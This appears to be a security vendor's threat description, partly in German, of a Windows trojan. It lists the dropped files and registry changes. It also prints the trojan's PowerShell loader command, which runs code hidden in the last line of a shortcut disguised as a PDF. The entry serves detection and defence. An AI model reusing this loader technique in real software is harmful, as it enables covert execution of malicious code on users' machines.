Trojan.Win32.ACLL.0NA103CE24

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Schleust die folgenden Dateien ein:

• %Application Data%\Microsoft\Windows\Recent\CustomDestinations\{Random Characters}.temp
• %User Temp%\{8 Random Characters}.pdh.ps1 - Deleted Afterwards
• %User Temp%\{8 Random Characters}.snn.psm1 - Deleted Afterwards
• %User Temp%\{8 Random Characters}.2tr.ps1 - Deleted Afterwards
• %User Temp%\{8 Random Characters}.bmj.psm1 - Deleted Afterwards
• %AppDataLocal%\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
• %AppDataLocal%\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

(Hinweis: %Application Data% ist der Ordner 'Anwendungsdaten' für den aktuellen Benutzer, normalerweise C:\Windows\Profile\{Benutzername}\Anwendungsdaten unter Windows 98 und ME, C:\WINNT\Profile\{Benutzername}\Anwendungsdaten unter Windows NT, C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Anwendungsdaten unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).. %User Temp% ist der Ordner 'Temp' des aktuellen Benutzers, normalerweise C:\Dokumente und Einstellungen\{Benutzername}\Lokale Einstellungen\Temp unter Windows 2000(32-bit), XP und Server 2003(32-bit) und C:\Users\{Benutzername}\AppData\Local\Temp unter Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) und 10(64-bit).)

Fügt die folgenden Prozesse hinzu:

• "C%System%\WindowsPowerShell\v1.0\powershell.exe" if (!(Test-Path fakes_war_time.pdf.lnk)) { if ((gci $env:tmp -Name Rar* | Select-Object -First 1) -ne $null) {cd $env:tmp/$(gci $env:tmp -Name Rar* | Select-Object -First 1)} else {cd $env:tmp/$(gci $env:tmp -Name *.zip.* | Select-Object -First 1)} } gc fakes_war_time.pdf.lnk -Tail "1" | powershell

(Hinweis: %System% ist der Windows Systemordner. Er lautet in der Regel C:\Windows\System unter Windows 98 und ME, C:\WINNT\System32 unter Windows NT und 2000 sowie C:\Windows\System32 unter Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) and 10(64-bit).)

Andere Systemänderungen

Ändert die folgenden Registrierungseinträge:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Internet Settings\
ZoneMap
UNCAsIntranet = 0

(Note: The default value data of the said registry entry is 1.)

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Internet Settings\
ZoneMap
AutoDetect = 1

(Note: The default value data of the said registry entry is 0.)